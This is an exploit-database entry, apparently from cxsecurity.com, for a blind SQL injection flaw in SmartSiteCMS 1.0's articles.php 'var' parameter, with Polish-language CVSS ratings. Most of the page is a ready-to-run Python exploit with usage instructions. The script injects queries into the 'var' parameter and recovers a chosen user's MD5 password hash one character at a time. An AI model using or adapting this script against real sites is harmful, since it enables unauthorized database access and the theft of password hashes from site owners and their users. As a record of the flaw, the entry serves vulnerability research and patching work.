SmartSiteCMS 1.0 (articles.php var) Blind SQL Injection Exploit

2009.02.06
Risk: High
Local: No
Remote: Yes
CWE: CWE-89


Ogólna skala CVSS: 7.5/10
Znaczenie: 6.4/10
Łatwość wykorzystania: 10/10
Wymagany dostęp: Zdalny
Złożoność ataku: Niska
Autoryzacja: Nie wymagana
Wpływ na poufność: Częściowy
Wpływ na integralność: Częściowy
Wpływ na dostępność: Częściowy

#!/usr/bin/python import sys import re from socket import * class exploit: def __init__(self,host,path,user): self.host=host self.path=path self.user=user self.reg=re.compile("<!-- END COMMENT FORM -->") def set_query(self,n,ch): self.query="' OR ASCII(SUBSTRING((SELECT password FROM users WHERE userName='"+self.user+"'),"+str(n)+",1)) = "+str(ord(ch))+" OR '1'='2" self.query = self.query.replace(" ","%20") self.query = self.query.replace("'","%27") self.request="GET "+self.path+"/articles.php?var="+self.query+" HTTP/1.0\r\nHost: "+self.host+"\r\n\n" def check(self): sock=socket(AF_INET, SOCK_STREAM) sock.connect((self.host, 80)) sock.send(self.request) r="" t="-" while(t!=""): t=sock.recv(1024) r+=t match=self.reg.search(r) if(r[match.start()+27:match.start()+59]!="<!-- END OF RELATED ARTICLES -->"): return 1 else: return 0 sock.close() print "////*****************************************\\\\\\\\" print "|||| smartSiteCMS 1.0 v1.0 ||||" print "|||| Blind SQL injection ||||" print "|||| ||||" print "|||| ~Author: certaindeath ||||" print "|||| ~Greetz: darkjoker ||||" print "\\\\\\\\*****************************************////\n" if(len(sys.argv) !=4 ): print "Usage: python xpl.py <host> <cms path> <user>" print "Example: python xpl.py localhost /cms admin" sys.exit(0) pwd="" xpl = exploit(sys.argv[1],sys.argv[2],sys.argv[3]) n=1 while(n<=32): t=0 xpl.set_query(n,str(t)) while (xpl.check()!=1): t+=1 xpl.set_query(n,str(hex(t))[-1]) pwd+=str(hex(t))[-1] n+=1 print "pass [md5]: ",pwd


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top